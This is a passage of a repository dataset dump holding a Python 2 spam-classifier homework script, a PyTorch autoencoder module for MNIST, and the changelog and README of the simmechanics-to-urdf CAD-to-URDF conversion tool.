trainings\ndef normalize_data(train_spam_count, train_spam_len, train_non_count, train_non_len):\n\tif train_spam_len < train_non_len:\n\t\tconstant = train_non_len/float(train_spam_len)\n\t\tfor k in train_spam_count.keys():\n\t\t\ttrain_spam_count[k] = train_spam_count[k] * constant\n\t\treturn train_spam_count\n\telse:\n\t\tconstant = train_spam_len/float(train_non_len)\n\t\tfor k in train_non_count.keys():\n\t\t\ttrain_non_count[k]= train_non_count[k] * constant\n\t\treturn train_non_count\n\n# Final part of printing if it is spam or not\ndef calculate_prob(words_count,train_spam_words,train_non_words):\n\tspam_prob = 0\n\tnon_prob = 0\n\tfor k in words_count.keys():\n\t\tif((k in train_non_words) and (k in train_spam_words)):\n\t\t\tspam_prob = spam_prob + train_spam_words[k]\n\t\t\tnon_prob = non_prob + train_non_words[k]\n\t\t\tprint k,train_non_words[k], train_spam_words[k]\n\t\telif (k in train_non_words):\n\t\t\tspam_prob = spam_prob + 0.01\n\t\t\tnon_prob = non_prob + train_non_words[k]\n\t\t\t#print spam_prob, non_prob\n\t\telif (k in train_spam_words):\n\t\t\tspam_prob = spam_prob + train_spam_words[k]\n\t\t\tnon_prob = non_prob + 0.01\n\t\t\t##print spam_prob, non_prob\n\t#print spam_prob, non_prob\n\tif (spam_prob<non_prob):\n\t\tprint 'not spam'\n\telse:\n\t\tprint 'spam'\n\ndir = '/Users/Nur/Documents/Spring_2015/Data_Mining/Assignment04/Data/'\n\ntrain_non_str = get_combined_text(dir,'NonSpamTrain250','NonSpamTrain',1,250)\ntrain_non_count_words = Counter(train_non_str.split())\ntrain_non_text_len = len(train_non_str.split())\n##train_non_common = top_common_words_prob(train_non_count_words, train_non_text_len)\n\n\ntrain_spam_str = get_combined_text(dir,'SpamTrain250','spamtrain',1,250)\ntrain_spam_count_words = Counter(train_spam_str.split())\ntrain_spam_text_len = len(train_spam_str.split())\ntrain_spam_common = top_common_words_prob(train_spam_count_words, train_spam_text_len)\n\n\n\nif (train_non_text_len < train_spam_text_len):\n\ttrain_non_count_words = normalize_data(train_spam_count_words,train_spam_text_len,train_non_count_words, train_non_text_len)\nelse:\n\ttrain_spam_count_words = normalize_data(train_spam_count_words,train_spam_text_len,train_non_count_words, train_non_text_len)\n\nprint train_non_count_words.most_common(30)\nprint train_spam_count_words.most_common(30)\n\ntest_str = get_combined_text(dir,'NonSpamTest100','NonSpamTest',10,15)\ntest_count_words = Counter(test_str.split())\ntest_text_len = len(test_str.split())\n\n\ncalculate_prob(test_count_words, train_spam_count_words, train_non_count_words)\n\n'''\nprint train_non_count_words.most_common(20)\nprint train_spam_text_len, train_non_text_len\nprint train_spam_text_len/float(train_non_text_len)\n'''\n\n'''\ntest = {}\ntest = test_count_words.most_common(20)\nfor k,v in test:\n\tif(k in train_non_count_words):\n\t\tprint k,train_non_count_words[k]\nprint '---------------'\nfor k,v in test:\n\tif(k in train_spam_count_words):\n\t\tprint k,train_spam_count_words[k]\n'''\n##print train_non_common * math.pow(10,250)\n##print train_spam_common * math.pow(10,250)\n##print test_total_prob * math.pow(10,240)\n\n" } ]
2
liacov/homework4_nndl
https://github.com/liacov/homework4_nndl
30adc1f52044f75d392417823855675a643f962c
02ad47bfa06003ef1b978771ca0d2f78a7771606
66f710b718335275949cf61d3df723d828cf9297
refs/heads/master
2022-12-08T06:43:15.418317
2020-08-19T09:28:58
2020-08-19T09:28:58
286,746,191
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5497311949729919, "alphanum_fraction": 0.5667155385017395, "avg_line_length": 34.894737243652344, "blob_id": "d2e92f7c1b88aa42cd48b17c75506d716a5dffdd", "content_id": "fd27c77cc50430806fc1e4019bb28b1a4733644e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8184, "license_type": "no_license", "max_line_length": 107, "num_lines": 228, "path": "/modules/autoencoder.py", "repo_name": "liacov/homework4_nndl", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport torch\nimport random\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom sklearn.model_selection import KFold\nfrom torch.utils.data import DataLoader, Subset\n\n\n#%% Define the network architecture\n\nclass Autoencoder(nn.Module):\n\n def __init__(self, encoded_space_dim):\n super().__init__()\n\n ### Encoder\n self.encoder_cnn = nn.Sequential(\n nn.Conv2d(1, 8, 3, stride=2, padding=1),\n nn.ReLU(True),\n nn.Conv2d(8, 16, 3, stride=2, padding=1),\n nn.ReLU(True),\n nn.Conv2d(16, 32, 3, stride=2, padding=0),\n nn.ReLU(True)\n )\n self.encoder_lin = nn.Sequential(\n nn.Linear(3 * 3 * 32, 64),\n nn.ReLU(True),\n nn.Linear(64, encoded_space_dim)\n )\n\n ### Decoder\n self.decoder_lin = nn.Sequential(\n nn.Linear(encoded_space_dim, 64),\n nn.ReLU(True),\n nn.Linear(64, 3 * 3 * 32),\n nn.ReLU(True)\n )\n self.decoder_conv = nn.Sequential(\n nn.ConvTranspose2d(32, 16, 3, stride=2, output_padding=0),\n nn.ReLU(True),\n nn.ConvTranspose2d(16, 8, 3, stride=2, padding=1, output_padding=1),\n nn.ReLU(True),\n nn.ConvTranspose2d(8, 1, 3, stride=2, padding=1, output_padding=1)\n )\n\n def forward(self, x):\n x = self.encode(x)\n x = self.decode(x)\n return x\n\n def encode(self, x):\n # Apply convolutions\n x = self.encoder_cnn(x)\n # Flatten\n x = x.view([x.size(0), -1])\n # Apply linear layers\n x = self.encoder_lin(x)\n return x\n\n def decode(self, x):\n # Apply linear layers\n x = self.decoder_lin(x)\n # Reshape\n x = x.view([-1, 32, 3, 3])\n # Apply transposed convolutions\n x = self.decoder_conv(x)\n x = torch.sigmoid(x)\n return x\n\n### Training function\ndef train_epoch(net, dataloader, loss_fn, optimizer, device):\n # Training\n net.train()\n train_loss = []\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Forward pass\n output = net(image_batch)\n loss = loss_fn(output, image_batch)\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # Save current loss\n train_loss.append(loss.data.item())\n return np.mean(train_loss)\n\n### Testing function\ndef test_epoch(net, dataloader, loss_fn, optimizer, device):\n # Validation\n net.eval() # Evaluation mode (e.g. disable dropout)\n with torch.no_grad(): # No need to track the gradients\n conc_out = torch.Tensor().float()\n conc_label = torch.Tensor().float()\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Forward pass\n out = net(image_batch)\n # Concatenate with previous outputs\n conc_out = torch.cat([conc_out, out.cpu()])\n conc_label = torch.cat([conc_label, image_batch.cpu()])\n del image_batch\n # Evaluate global loss\n val_loss = loss_fn(conc_out, conc_label)\n return val_loss.data\n\n\n### k-Fold Cross Validation function\ndef train_CV(indices, device, train_dataset, encoded_dim=8, lr=1e-3, wd=0, num_epochs=20):\n # K_FOLD parameters\n kf = KFold(n_splits=3, random_state=42, shuffle=True)\n\n train_loss_log = []\n val_loss_log = []\n\n for fold, (train_idx, valid_idx) in enumerate(kf.split(indices)):\n print(\"+++ FOLD {} +++\".format(fold))\n\n train_loss_log_fold = []\n val_loss_log_fold = []\n\n # initialize the net\n cv_net = Autoencoder(encoded_space_dim=encoded_dim)\n\n # Move all the network parameters to the selected device\n # (if they are already on that device nothing happens)\n cv_net.to(device)\n\n ### Define a loss function\n loss_fn = torch.nn.MSELoss()\n\n ### Define an optimizer\n optim = torch.optim.Adam(cv_net.parameters(), lr=lr, weight_decay=wd)\n\n # create the dataloaders\n train_dataloader_fold = DataLoader(Subset(train_dataset, train_idx), batch_size=500, shuffle=False)\n valid_dataloader_fold = DataLoader(Subset(train_dataset, valid_idx), batch_size=500, shuffle=False)\n\n\n for epoch in range(num_epochs):\n print('EPOCH %d/%d' % (epoch + 1, num_epochs))\n ### Training\n avg_train_loss = train_epoch(cv_net, dataloader=train_dataloader_fold,\n loss_fn=loss_fn, optimizer=optim,\n device=device)\n ### Validation\n avg_val_loss = test_epoch(cv_net, dataloader=valid_dataloader_fold,\n loss_fn=loss_fn, optimizer=optim,\n device=device)\n # Print loss\n print('\\t TRAINING - EPOCH %d/%d - loss: %f' % (epoch + 1, num_epochs, avg_train_loss))\n print('\\t VALIDATION - EPOCH %d/%d - loss: %f\\n' % (epoch + 1, num_epochs, avg_val_loss))\n\n # Log\n train_loss_log_fold.append(avg_train_loss)\n val_loss_log_fold.append(avg_val_loss)\n\n train_loss_log.append(train_loss_log_fold)\n val_loss_log.append(val_loss_log_fold)\n\n return {\"train loss\": np.mean(train_loss_log, axis=0),\n \"validation loss\": np.mean(val_loss_log, axis=0)}\n\n\n### Testing function with random noise\ndef test_random_noise(net, dataloader, loss_fn, device, noise_type, sigma = 1, plot = True):\n \"\"\" Test the trained autoencoder on randomly corrupted images.\n The random noise can be generated using the 'gaussian', 'uniform' or 'occlusion' method. \"\"\"\n np.random.seed(42)\n\n net.eval() # Evaluation mode (e.g. disable dropout)\n with torch.no_grad(): # No need to track the gradients\n conc_out = torch.Tensor().float()\n conc_label = torch.Tensor().float()\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Add noise\n gaussian = ''\n if noise_type == 'Gaussian':\n noise = torch.Tensor(np.random.normal(0,sigma,sample_batch[0].shape))\n corrupted_image = (sample_batch[0] + noise).to(device)\n gaussian = f' with N(0, {sigma})'\n if noise_type == 'Uniform':\n noise = torch.Tensor(np.random.rand(*sample_batch[0].shape))\n corrupted_image = (sample_batch[0] + noise).to(device)\n if noise_type == 'Occlusion':\n idx = np.random.choice((0,1), 2)\n corrupted_image = deepcopy(image_batch)\n corrupted_image[:, :, idx[0]*14:(idx[0]+1)*14, idx[1]*14:(idx[1]+1)*14] = 0\n\n # Forward pass\n out = net(corrupted_image)\n\n # Concatenate with previous outputs\n conc_out = torch.cat([conc_out, out.cpu()])\n conc_label = torch.cat([conc_label, image_batch.cpu()])\n\n # plot images\n if plot:\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 3, 1)\n plt.title(\"Original\", fontsize=18)\n plt.imshow(image_batch[0].squeeze().cpu(), cmap='gist_gray')\n plt.subplot(1, 3, 2)\n plt.title(f\"{noise_type} noise\"+gaussian, fontsize=18)\n plt.imshow(corrupted_image[0].squeeze().cpu(), cmap='gist_gray')\n plt.subplot(1, 3, 3)\n plt.title(\"Reconstructed\", fontsize=18)\n plt.imshow(out[0].squeeze().cpu(), cmap='gist_gray')\n plt.savefig(f\"./images/{noise_type}\" + gaussian + \".png\")\n plt.show()\n\n\n # Evaluate global loss\n val_loss = loss_fn(conc_out, conc_label)\n\n return val_loss.data\n" } ]
1
robotology/simmechanics-to-urdf
https://github.com/robotology/simmechanics-to-urdf
1cde25697027241088e7c638b12125f249b35828
9431d99570921d20002461a02d4974020e97f22a
33cc2d35daac0d7765c7a5afa56fcb6a40032b2c
refs/heads/master
2023-03-31T03:25:05.419383
2023-03-28T16:42:46
2023-03-28T16:42:46
22,375,697
32
7
null
2014-07-29T10:05:55
2023-01-17T21:08:36
2023-03-28T16:42:46
Python
[ { "alpha_fraction": 0.6683608889579773, "alphanum_fraction": 0.725540041923523, "avg_line_length": 30.479999542236328, "blob_id": "5f80a63c3cec2dd4fc346c758a1650652e9bedeb", "content_id": "3ee746953173dfdaad67a3d5207aac1a1d4309a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 787, "license_type": "no_license", "max_line_length": 153, "num_lines": 25, "path": "/CHANGELOG.md", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "# Changelog\nAll notable changes to this project will be documented in this file.\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [Unreleased]\n\n### Add\n- Add the possibility to export the frame coincident with the ft sensor frame (https://github.com/robotology/simmechanics-to-urdf/pull/53).\n\n## [0.4.1] - 2022-12-20\n\n### Fixed\n\n- Fixed version number in setup.py (https://github.com/robotology/simmechanics-to-urdf/pull/54).\n\n## [0.4.0] - 2022-12-20\n\n### Add\n- Add the possibility to assign the colors in the yaml file when the urdf model is generated (https://github.com/robotology/simmechanics-to-urdf/pull/51)\n\n## [0.3.0] - 2022-01-28\n\nFirst tagged release.\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.47826087474823, "avg_line_length": 22, "blob_id": "607b99887615a6fb3c429dbcd0bf1931611051d6", "content_id": "584ce6d35d80d5f906acd5febbfb363f0a71b4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/simmechanics_to_urdf/__init__.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "__all__ = [\"firstgen\"]\n" }, { "alpha_fraction": 0.6953208446502686, "alphanum_fraction": 0.7036541700363159, "avg_line_length": 76.37931060791016, "blob_id": "70c195685a573f8232ffb4504a9b91eb62291ff9", "content_id": "7f1ad43ca2a222f64e0fc733ffdbec4c0973529a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 22440, "license_type": "no_license", "max_line_length": 762, "num_lines": 290, "path": "/README.md", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "simmechanics-to-urdf [![Build Status](https://travis-ci.org/robotology/simmechanics-to-urdf.svg?branch=master)](https://travis-ci.org/robotology/simmechanics-to-urdf)\n====================\n\n\n\nThis tool was developed to convert CAD models to URDF ( http://wiki.ros.org/urdf ) models semi-automatically. It makes use of the XML files exported by the SimMechanics Link . Mathworks, makers of SimMechanics, have developed plugins for a couple of leading CAD programs, including SolidWorks, ProEngineer and Inventor.\n\nMore specifically, this library at the moment just support first-generation SimMechanics XML files, that in MathWorks documentation are also referred as `PhysicalModelingXMLFile` .\n\nBased on the [original version](http://wiki.ros.org/simmechanics_to_urdf) by [David V. Lu!!](http://www.cse.wustl.edu/~dvl1/).\n\n**Warning: this tool only works with [MATLAB versions <= R2017b](https://github.com/robotology/simmechanics-to-urdf/issues/39) and [PTC Creo versions <= 8](https://github.com/robotology/simmechanics-to-urdf/issues/55). If you need to use either a newer version of MATLAB or a newer version of PTC Creo, you cannot use this tool.**\n\n#### Dependencies\n- [Python](https://www.python.org/)\n- [lxml](http://lxml.de/)\n- [PyYAML](http://pyyaml.org/)\n- [NumPy](http://www.numpy.org/)\n- [catkin_pkg](http://wiki.ros.org/catkin_pkg)\n- [urdf_parser_py](https://github.com/ros/urdf_parser_py)\n\n## Installation\n\n#### Windows\n##### Install dependencies\nThis conversion script uses Python, so you have to install Python for Windows:\nhttps://www.python.org/downloads/windows/ .\n\n#### OS X\n##### Install dependencies\nTo install the dependencies, a easy way is to have installed `pip`, that is installed\nif you use the python version provided by homebrew.\nIf you have `pip` installed you can get all necessary dependencies with:\n~~~\npip install lxml numpy pyyaml catkin_pkg\n~~~\n\n#### Debian/Ubuntu\n\n**As the installation procedure at this moment suggest to install `pip` packages at the system level via administrative priviliges (such as `sudo`) at this moment it is suggest to follow it only on a dedicated environment, and not in your main development machine. See https://stackoverflow.com/a/22517157/1379427 for more details.**\n\n\n##### Install dependencies\nInstall the necessary dependencies with apt-get:\n~~~\nsudo apt-get install python-lxml python-yaml python-numpy python-setuptools python-catkin-pkg\n~~~\n\nYou can install `urdf_parser_py` from its git repository. Note that due to some regression in recent versions on the default branch of `urdf_parser_py` (see https://github.com/robotology/simmechanics-to-urdf/issues/36) it is recommended to use a specific commit of `urdf_parser_py` that is known to work, https://github.com/ros/urdf_parser_py/commit/31474b9baaf7c3845b40e5a9aa87d5900a2282c3 :\n~~~\ngit clone https://github.com/ros/urdf_parser_py\ncd urdf_parser_py\ngit checkout 31474b9baaf7c3845b40e5a9aa87d5900a2282c3\nsudo python setup.py install\n~~~\n\n##### Install simmechanics-to-urdf\nYou can then install `simmechanics-to-urdf`:\n~~~\ngit clone https://github.com/robotology/simmechanics-to-urdf\ncd simmechanics-to-urdf\nsudo python setup.py install\n~~~\n\n## How it works\nThe SimMechanics Link creates an XML file (PhysicalModelingXMLFile) and a collection of STL files. The XML describes all of the bodies, reference frames, inertial frames and joints for the model. The simmechanics_to_urdf script takes this information and converts it to a URDF. However, there are some tricks and caveats, which can maneuvered using a couple of parameters files. Not properly specifing this parameters files will result in a model that looks correct when not moving, but possibly does not move correctly.\n\n### Tree vs. Graph\n\nURDF allows robot descriptions to only follow a tree structure, meaning that each link/body can have only one parent, and its position is dependent on the position of its parent and the position of the joint connecting it to its parent. This forces URDF descriptions to be in a tree structure.\n\nCAD files do not generally follow this restriction; one body can be dependent on multiple bodies, or at the very least, aligned to multiple bodies.\n\nThis creates two problems.\n\n - The graph must be converted into a tree structure. This is done by means of a breadth first traversal of the graph, starting from the root link. However, this sometimes leads to improper dependencies, which can be corrected with the parameter file, as described below.\n\n - Fixed joints in CAD are not always fixed in the exported XML. To best understand this, consider the example where you have bodies A, B and C, all connected to each other. If C is connected to A in such a way that it is constrained in the X and Z dimensions, and C is connected to B so that it is constrained in the Y dimension, then effectively, C is fixed/welded to both of those bodies. Thus removing the joint between B and C (which is needed to make the tree structure) frees up the joint. This also can be fixed with the parameter file.\n\n## Use the script\nYou can call the script:\n~~~\nsimmechanics_to_urdf {SimMechanics XML filename} --yaml [yaml_configfile] --csv-joint csv_joints_configfile --output {xml|graph|none}\n~~~\nThe `--output` options defines the output. Selecting graph the script will output a graphviz .dot representation\nof the SimMechanics model, useful for debugging, while selecting xml it will output the converted URDF.\n\n### Configuration files\n\n#### YAML Parameter File\nThe YAML format is used to pass parameters to the script to customized the conversion process.\nThe file is loaded using the Python (yaml)[http://pyyaml.org/] module.\nThe parameter accepted by the script are documented in the following.\n\n\n##### Naming Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `robotName` | String | model name set in the file PhysicalModelingXMLFile | Used for setting the model name, i.e. the parameter `<robot name=\"...\">` in the `URDF` model file. |\n| `rename` | Map | {} (Empty Map) | Structure mapping the SimMechanics XML names to the desired URDF names. |\n\n\n##### Root Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:------:|:------------:|:-------------:|\n| `root` | String | First body in the file | Changes the root body of the tree |\n| `originXYZ` | List | empty | Changes the position of the root body |\n| `originRPY` | List | empty | Changes the orientation of the root body |\n\n##### Algorithm Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:------:|:-------------:|:-------------:|\n| `epsilon` | Float | 4*(Machine *eps*) | Set a custom value for testing whether a number is close to zero |\n\n##### Frame Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkFrames` | Array | empty | Structure mapping the link names to the displayName of their desired frame. Unfortunatly in URDF the link frame origin placement is not free, but it is constrained to be placed on the parent joint axis, hence this option is for now reserved to the root link and to links connected to their parent by a fixed joint |\n| `exportAllUseradded` | Boolean | False | If true, export all SimMechanics frame tagged with `USERADDED` in the output URDF as fake links i.e. fake link with zero mass connected to a link with a fixed joint.. |\n| `exportedFrames` | Array | empty | Array of `displayName` of UserAdded frames to export. This are exported as fixed URDF frames, i.e. fake link with zero mass connected to a link with a fixed joint. |\n\n###### Link Frames Parameters (keys of elements of `linkFrames`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:-----------:|:-------------:|\n| `linkName` | String | Mandatory | name of the link for which we want to set the frame |\n| `frameName` | String | Mandatory | `displayName` of the frame that we want to use as link frame. This frame should be attached to the `frameReferenceLink` link. The default value for `frameReferenceLink` is `linkName` |\n| `frameReferenceLink` | String | empty | `frameReferenceLink` at which the frame is attached. If `frameReferenceLink` is empty, it will default to `linkName` |\n\n\n\n###### Exported Frame Parameters (keys of elements of `exportedFrames`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `frameName` | String | Mandatory | `displayName` of the frame in which the sensor measure is expressed. The selected frame should be attached to the `referenceLink` link, but `referenceLink` can be be omitted if the frameName is unique in the model. |\n| `frameReferenceLink` | String | empty | `frameReferenceLink` at which the frame is attached. If `referenceLink` is empty, it will be selected the first USERADDED frame with the specified `frameName` |\n| `exportedFrameName` | String | sensorName | Name of the URDF link exported by the `exportedFrames` option |\n| `additionalTransformation` | List | Empty | Additional transformation applied to the exported frame, it is expressed as [x, y, z, r, p, y] according to the semantics and units of the [SDF convention](http://sdformat.org/tutorials?tut=specify_pose&cat=specification&) for expressing poses. If the unmodified transformation of the additionalFrame is indicated as linkFrame_H_additionalFrameOld, this parameter specifies the additionalFrameOld_H_additionalFrame transform, and the final transform exported in the URDF is computed as linkFrame_H_additionalFrame = linkFrame_H_additionalFrameOld*additionalFrameOld_H_additionalFrame . If not specified it is assume to be the `[0, 0, 0, 0, 0, 0]` element and the specified frame is exported in the URDF unmodified. |\n\n##### Mesh Parameters\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `filenameformat` | String | %s | Used for translating the filenames in the exported XML to the URDF filenames, using a formatting string. Example: \"package://my_package//folder/%sb\" - resolves to the package name and adds a \"b\" at the end to indicate a binary stl. |\n| `filenameformatchangeext` | String | %s | Similar to filenameformat, but use to also change the file extensions and not only the path of the filenames |\n| `forcelowercase` | Boolean | False | Used for translating the filenames. Ff True, it forces all filenames to be lower case. |\n| `scale` | String | None | If this parameter is defined, the scale attribute of the mesh in the URDF will be set to its value. Example: \"0.01 0.01 0.01\" - if your meshes were saved using centimeters as units instead of meters. |\n| `stringToRemoveFromMeshFileName` | String | None | This parameter allows to specify a string that will be removed from the mesh file names. Example: \"_prt\" |\n| `assignedCollisionGeometry` | Array | None | Structure for redefining the collision geometry for a given link. |\n| `assignedColors` | Map | {} (Empty Map) | If a link is in this map, the color found in the SimMechanics file is substituted with the one passed through this map. The color is represented by a 4 element vector of containing numbers from 0 to 1 representing the red, green, blue and alpha component. |\n\n###### Assigned collision geometries (keys of elements of `assignedCollisionGeometry`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the link for which the collision geometry is specified. |\n| `geometricShape` | Dictionary | Mandatory | This dictionary contains the parameters used to define the type and the position of the geometric shape. In particular we have: <ul><li>shape: geometric shape type. Supported \"box\", \"cylinder\", \"sphere\". </li><li>type dependent geometric shape parameters. Refer to [SDF Geometry](http://sdformat.org/spec?elem=geometry). </li><li>origin: String defining the pose of the geometric shape with respect to the `linkFrame`. </li></ul> |\n\n~~~\nassignedCollisionGeometry:\n - linkName: r_foot\n geometricShape:\n shape: cylinder\n radius: 0.16\n length: 0.06\n origin: \"0.0 0.03 0.0 1.57079632679 0.0 0.0\"\n - linkName: l_foot\n geometricShape:\n shape: box\n size: 0.4 0.2 0.1\n origin: \"0.0 0.0 0.0 0.0 0.0 0.0\"\n~~~\n\n\n##### Inertia parameters\nParameters related to the inertia parameters of a link\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `assignedMasses` | Map | {} (Empty Map) | If a link is in this map, the mass found in the SimMechanics file is substituted with the one passed through this map. Furthermore, the inertia matrix present in the SimMechanics file is scaled accounting for the new mass (i.e. multiplied by new_mass/old_mass). The mass is expressed in Kg. |\n| `assignedInertias` | Array | empty | Structure for redefining the inertia tensor (at the COM) for a given link. |\n\n###### Assigned Inertias parameters (elements of `assignedInertias` parameters)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:-----------:|:-------------:|\n| `linkName` | String | Mandatory | name of the link for which we want to set the frame |\n| `xx` | String | empty | If defined, change the Ixx value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n| `yy` | String | empty | If defined, change the Iyy value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n| `zz` | String | empty | If defined, change the Izz value of the inertia matrix of the link. Unit of measure: Kg*m^2 . |\n\n~~~\nassignedMasses:\n link1: 1\n link2: 3\n\nassignedInertias:\n - linkName: link1\n xx: 0.0001\n - linkName: link1\n xx: 0.0003\n yy: 0.0003\n zz: 0.0003\n~~~\n\n##### Sensors Parameters\nSensor information can be expressed using arrays of sensor options.\nNote that given that the URDF still does not support an official format for expressing sensor information,\nthis script will output two different elements for each sensor:\n* a `<gazebo>` element, necessary to simulate the sensor in Gazebo when loading the URDF, as documented in http://gazebosim.org/tutorials?tut=ros_gzplugins .\n* a more URDF-like `<sensor>` element, in particular the variant supported by the iDynTree library, as documented in https://github.com/robotology/idyntree/blob/master/doc/model_loading.md .\n\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `forceTorqueSensors` | Array | empty | Array of option for exporting 6-Axis ForceTorque sensors |\n| `sensors` | Array | empty | Array of option for exporting generic sensors (e.g. camera, depth, imu, ray..) |\n\n###### ForceTorque Sensors Parameters (keys of elements of `forceTorqueSensors`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `jointName` | String | empty | Name of the Joint for which this sensor measure the ForceTorque. |\n| `directionChildToParent` | Bool | True | True if the sensor measures the force excerted by the child on the parent, false otherwise |\n| `sensorName` | String | jointName | Name of the sensor, to be used in the output URDF file |\n| `exportFrameInURDF` | Bool | False | If true, export a fake URDF link whose frame is coincident with the sensor frame (as if the sensor frame was added to the `exportedFrames` array). |\n| `exportedFrameName` | String | `sensorName` if defined `jointName` otherwise | Name of the URDF link exported by the `exportFrameInURDF` option |\n| `frameName` | String | empty | Name of the frame in which the sensor measure is expressed. Mandatory if `exportFrameInURDF` is set to yes. |\n| `linkName` | String | empty | Name of the parent link at which the sensor is rigidly attached. Mandatory if `exportFrameInURDF` is set to yes. |\n| `frameReferenceLink` | String | `linkName` | link at which the sensor frame is attached (to make sense, this link should be rigidly attached to the `linkName`. By default `referenceLink` is assumed to be `linkName`.\n| `frame` | String | empty | The value of this element may be one of: child, parent, or sensor. It is the frame in which the forces and torques should be expressed. The values parent and child refer to the parent or child links of the joint. The value sensor means the measurement is rotated by the rotation component of the `<pose>` of this sensor. The translation component of the pose has no effect on the measurement. |\n| `sensorBlobs` | String | empty | Array of strings (possibly on multiple lines) represeting complex XML blobs that will be included as child of the `<sensor>` element of type \"force_torque\" |\n\nNote that for now the FT sensors sensor frame is required to be coincident with child link frame, due\nto URDF limitations.\n\n###### Generic Sensors Parameters (keys of elements of `sensors`)\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `linkName` | String | Mandatory | Name of the Link at which the sensor is rigidly attached. |\n| `frameName` | String | empty | `displayName` of the frame in which the sensor measure is expressed. The selected frame must be attached to the `referenceLink` link. If empty the frame used for the sensor is coincident with the link frame. |\n| `frameReferenceLink` | String | linkName | link at which the sensor frame is attached (to make sense, this link should be rigidly attached to the `linkName`. By default `referenceLink` is assumed to be `linkName`.\n| `sensorName` | String | LinkName_FrameName | Name of the sensor, to be used in the output URDF file |\n| `exportFrameInURDF` | Bool | False | If true, export a fake URDF link whose frame is coincident with the sensor frame (as if the sensor frame was added to the `exportedFrames` array) |\n| `exportedFrameName` | String | sensorName | Name of the URDF link exported by the `exportFrameInURDF` option |\n| `sensorType` | String | Mandatory | Type of sensor. Supported: \"altimeter\", \"camera\", \"contact\", \"depth\", \"gps\", \"gpu_ray\", \"imu\", \"logical_camera\", \"magnetometer\", \"multicamera\", \"ray\", \"rfid\", \"rfidtag\", \"sonar\", \"wireless_receiver\", \"wireless_transmitter\" |\n| `updateRate` | String | Mandatory | Number representing the update rate of the sensor. Expressed in [Hz]. |\n| `sensorBlobs` | String | empty | Array of strings (possibly on multiple lines) represeting complex XML blobs that will be included as child of the `<sensor>` element |\n\n##### Mirrored Inertia Parameters\nSimMechanics Link has some problems dealing with mirrored mechanism, in particularly when dealing with exporting inertia information. For this reason we provide\nan option to use for some links not the inertial information (mass, center of mass, inertia matrix) provided in the SimMechanics XML, but instead to \"mirror\"\nthe inertia information of some other link, relyng on the simmetry of the model.\n\nTODO document this part\n\n##### XML Blobs options\nIF you use extensions of URDF, we frequently want to add non-standard tags as child of the `<robot>` root element.\nUsing the XMLBlobs option, you can pass an array of strings (event on multiple lines) represeting complex XML blobs that you\nwant to include in the converted URDF file. This will be included without modifications in the converted URDF file.\nNote that every blob must have only one root element.\n\n| Attribute name | Type | Default Value | Description |\n|:----------------:|:---------:|:------------:|:-------------:|\n| `XMLBlobs ` | Array of String | [] (empty array) | List of XML Blobs to include in the URDF file as children of `<robot>` |\n\n#### CSV Parameter File\nUsing the `--csv-joints` options it is possible to load some joint-related information from a csv\nfile. The rationale for using CSV over YAML for some information related to the model (for example joint limits) is to use a format that it is easier to modify using common spreadsheet tools like Excel/LibreOffice Calc, that can be easily used also by people without a background in computer science.\n\n##### Format\nThe CSV file is loaded by loaded by the python `csv` module, so every dialect supported\nby the [`csv.Sniffer()`](https://docs.python.org/library/csv.html#csv.Sniffer) is automatically\nsupported by `simmechanics-to-urdf`.\n\nThe CSV file is formed by a header line followed by several content lines,\nas in this example:\n~~~\njoint_name,lower_limit,upper_limit\ntorso_yaw,-20.0,20.0\ntorso_roll,-20.0,20.0\n~~~\n\nThe order of the elements in header line is arbitrary, but the supported attributes\nare listed in the following:\n\n| Attribute name | Required | Unit of Measure | Description |\n|:--------------:|:--------:|:----------------:|:---------------:|\n| joint_name | **Yes** | - | Name of the joint to which the content line is referring |\n| lower_limit | No | Degrees | `lower` attribute of the `limit` child element of the URDF 